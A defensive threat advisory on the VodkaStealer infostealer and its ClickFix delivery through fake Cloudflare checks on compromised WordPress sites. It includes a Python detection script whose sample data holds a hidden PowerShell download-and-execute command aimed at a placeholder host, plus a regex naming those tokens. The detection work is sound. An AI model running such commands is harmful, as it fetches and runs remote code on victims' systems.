VodkaStealer Malware Harvests Browser Credentials and Session Token

Threat Group – Unidentified financially motivated threat actor associated with the ClickFix WordPress compromise campaign
Threat Type – Information Stealer
Exploited Vulnerabilities – ClickFix social engineering using compromised WordPress sites and fake Cloudflare verification prompts
Malware Used – VodkaStealer, DoubleDonut loader, ChromElevator
Threat Score – 🔴 7.6 High – Advanced credential harvesting malware delivered through large scale ClickFix campaigns with in memory execution and extensive browser and wallet data theft capability
Last Threat Observation – 10 March 2026


Overview

VodkaStealer is a recently observed information stealing malware written in C++ that targets browser stored credentials, cryptocurrency wallets, and application data from infected Windows systems. The malware has been identified as part of a wider ClickFix infection chain involving compromised WordPress websites that present visitors with fake Cloudflare verification prompts designed to trick users into executing malicious PowerShell commands.

The ClickFix technique represents a notable evolution in malware distribution. Instead of relying on traditional phishing attachments or malicious downloads, attackers compromise legitimate websites and inject malicious scripts that display convincing verification prompts. Victims are instructed to run commands that appear to validate human interaction but instead execute malware delivery scripts.

Once the victim runs the provided command, a multi stage loader sequence begins. This chain typically downloads shellcode which launches further payload stages entirely in memory. The delivery mechanism reduces forensic artifacts on disk and complicates detection by traditional security tools.

VodkaStealer’s primary goal is to harvest sensitive information from browsers and cryptocurrency wallet applications. The malware enumerates browser profiles, extracts stored credential databases, collects cookies, and retrieves authentication related files. This information is staged locally before being transmitted to attacker controlled infrastructure.

The malware specifically targets multiple Chromium based browsers including Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex, and Chromium itself. In addition to browser credential harvesting, VodkaStealer extracts data from Mozilla Firefox by copying key credential and certificate files.

Beyond browser data the malware aggressively targets cryptocurrency wallet software. Files associated with Ledger Live, Ledger Wallet, Trezor, Exodus, Electrum, Coinomi, Jaxx, and Guarda are collected when present on the system. This behaviour highlights the growing convergence between credential stealing malware and financial theft operations.

VodkaStealer also captures screenshots, gathers system configuration information, and records installed software details. These additional artifacts provide attackers with contextual information that can assist in monetisation of stolen data or follow on intrusion activity.

Unlike many modern information stealers that rely heavily on complex code obfuscation, VodkaStealer, according to current analysis, lacks extensive binary protection mechanisms. In some analysed samples, configuration values and command infrastructure information were found directly within the unpacked binary.

The malware is therefore notable not for sophisticated obfuscation but for the scale and effectiveness of its distribution campaign combined with its extensive credential and wallet harvesting capabilities.


Key Details

Delivery Method – ClickFix social engineering via compromised WordPress websites impersonating Cloudflare verification pages that instruct victims to execute malicious PowerShell commands

Target – Windows users visiting compromised websites, cryptocurrency holders, and enterprise users with browser stored credentials

Functions

• Collects credentials and cookies from Chromium based browsers
• Extracts credential databases and authentication files from Firefox
• Harvests data from cryptocurrency wallet applications including Ledger Live, Ledger Wallet, Trezor, Exodus, Electrum, Coinomi, and Guarda
• Captures system screenshots and collects environment information
• Enumerates installed software and application data directories

Obfuscation – Limited binary obfuscation with configuration values and command infrastructure information visible within unpacked samples


Attack Vectors

The primary infection vector for VodkaStealer is a ClickFix campaign delivered through compromised WordPress websites.

Visitors to infected websites encounter a page designed to resemble a legitimate Cloudflare human verification check. The page instructs the visitor to run a command in order to confirm they are not a bot. The command provided by the page is actually a malicious PowerShell instruction that begins the malware download chain.

Once executed, the command downloads shellcode that launches the next stage of the attack. The first stage shellcode loads a downloader component which retrieves additional shellcode from attacker infrastructure.

This sequence is sometimes referred to as a DoubleDonut loader chain. The loader executes shellcode directly in memory and injects the payload into a legitimate system process such as svchost.exe. This process injection technique helps the malware avoid detection and allows it to operate under the context of trusted system processes.

The final stage payload delivers the VodkaStealer infostealer. After execution the malware enumerates installed browsers and wallet software, copies targeted credential files, and stores them in a temporary staging directory.

The staging directory is typically named using a combination of the victim’s country code, IP related information, and timestamp data. This directory structure assists attackers in organising stolen data from multiple victims.

Once data collection is complete the malware compresses the harvested files and prepares them for exfiltration to command infrastructure controlled by the attackers.

Because much of the execution chain occurs in memory and only temporary staging artifacts are written to disk, the attack can leave relatively limited forensic traces on compromised systems.


Known Indicators of Compromise

Indicators may vary across campaigns and malware samples.



Mitigation and Prevention

Organisations should deploy layered security controls to detect and prevent credential stealing malware and social engineering attacks.

Mitigation Checklist

User Awareness

Users should be trained to recognise suspicious verification prompts and instructed never to execute commands provided by websites.

Email Filtering

Security gateways should filter malicious links and block phishing messages that direct users to compromised websites.

Antivirus Protection

Endpoint detection and response tools should monitor for suspicious PowerShell execution and abnormal process injection behaviour.

Two Factor Authentication

Strong multi factor authentication reduces the risk associated with stolen credentials and helps prevent account takeover.

Log Monitoring

Security teams should monitor for unusual authentication activity and suspicious process behaviour such as svchost process injection.

Regular Updates

Operating systems, browsers, and endpoint security tools should be kept fully updated to reduce exposure to exploitation and malware delivery techniques.
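The Attack Vectors section describes the chain as PowerShell launched from a pasted lure command, followed by in-memory loading and injection into svchost.exe, and the checklist above asks teams to monitor for exactly those behaviours. The following Python triage routine is an added example, not code from this advisory or from the cited research: it runs three rules over constructed Sysmon-style ProcessCreate and CreateRemoteThread events. It assumes the victim pastes the command into the Run dialog (so explorer.exe is PowerShell's parent) and uses simplified field names rather than real Sysmon XML.

```python
"""Triage constructed Sysmon-style events for the ClickFix -> in-memory loader -> svchost.exe chain."""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"

# Constructed sample events in Sysmon vocabulary: 1 = ProcessCreate, 8 = CreateRemoteThread.
EVENTS = [
    {"id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": 'powershell -w hidden -nop -c "iwr hxxp://example.invalid/x | iex"'},
    {"id": 1, "image": SVCHOST, "parent": PS, "cmd": "svchost.exe"},
    {"id": 8, "source": PS, "target": SVCHOST},
    {"id": 1, "image": SVCHOST, "parent": r"C:\Windows\System32\services.exe",
     "cmd": "svchost.exe -k netsvcs -p"},
    {"id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell Get-ChildItem C:\\Temp"},
]

# Download-and-execute or window-hiding switches typical of pasted ClickFix commands.
CLICKFIX_TOKENS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-nop\b|\biwr\b|"
    r"invoke-webrequest|downloadstring|\biex\b|invoke-expression)", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return (rule, detail) findings in event order."""
    findings = []
    for e in events:
        if e["id"] == 1:
            img, parent = basename(e["image"]), basename(e["parent"])
            # Assumption: the lure command is pasted into the Run dialog, so the
            # interactive shell (explorer.exe) is PowerShell's parent process.
            if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
                    and CLICKFIX_TOKENS.search(e["cmd"]):
                findings.append(("clickfix_powershell", e["cmd"]))
            # Legitimate svchost.exe instances are started by services.exe; any
            # other parent suggests a hollowed or injected host process.
            if img == "svchost.exe" and parent != "services.exe":
                findings.append(("svchost_unusual_parent", e["parent"]))
        elif e["id"] == 8 and basename(e["target"]) == "svchost.exe":
            # A remote thread created inside svchost.exe is a classic injection signal.
            findings.append(("svchost_remote_thread", e["source"]))
    return findings

if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(f"{rule}: {detail}")
```

The benign svchost.exe started by services.exe and the ordinary interactive PowerShell command produce no findings, which is the false-positive check a detection engineer would want before deploying similar rules.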


Risk Assessment

VodkaStealer represents a significant threat because of its combination of large scale distribution and extensive credential harvesting capabilities.

The ClickFix campaign technique allows attackers to leverage compromised but otherwise legitimate websites as delivery infrastructure. This dramatically increases the potential victim pool because users may trust the websites they are visiting.

The use of in memory shellcode loaders and process injection further complicates detection by traditional antivirus solutions that rely heavily on disk based scanning.

By targeting both browser credential stores and cryptocurrency wallet software, the malware provides attackers with immediate opportunities for financial theft. Stolen browser cookies and authentication data can also enable attackers to hijack active sessions without requiring passwords.

In corporate environments these stolen credentials may provide access to cloud services, internal systems, and remote access platforms. This makes infostealer infections a frequent precursor to larger security incidents including ransomware attacks and corporate data breaches.

Because VodkaStealer harvests a wide range of credential and wallet artifacts while leaving relatively limited persistent traces, organisations must treat suspected infections as high priority security incidents requiring immediate investigation and credential resets.


Conclusion

VodkaStealer demonstrates how modern information stealing malware campaigns combine social engineering, compromised websites, and in memory execution techniques to bypass traditional security defences.

The malware’s focus on browser credentials and cryptocurrency wallet data reflects the growing financial incentives driving cybercrime operations. Even a single infected endpoint can expose large volumes of sensitive information.

Organisations should prioritise user education, endpoint monitoring, and credential protection strategies to reduce the risk posed by infostealer malware campaigns.

Proactive detection of suspicious PowerShell activity and process injection behaviour can significantly improve an organisation’s ability to detect and contain threats such as VodkaStealer before stolen credentials are weaponised.


Sources

Rapid7 – When Trusted Websites Turn Malicious WordPress Compromises Advance Global Stealer Operation – https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation/
Cyber Daily – Pressing matter: A global WordPress ClickFix malware campaign is targeting Australian websites – https://www.cyberdaily.au/security/13311-pressing-matter-a-global-wordpress-clickfix-malware-campaign-is-targeting-australian-websites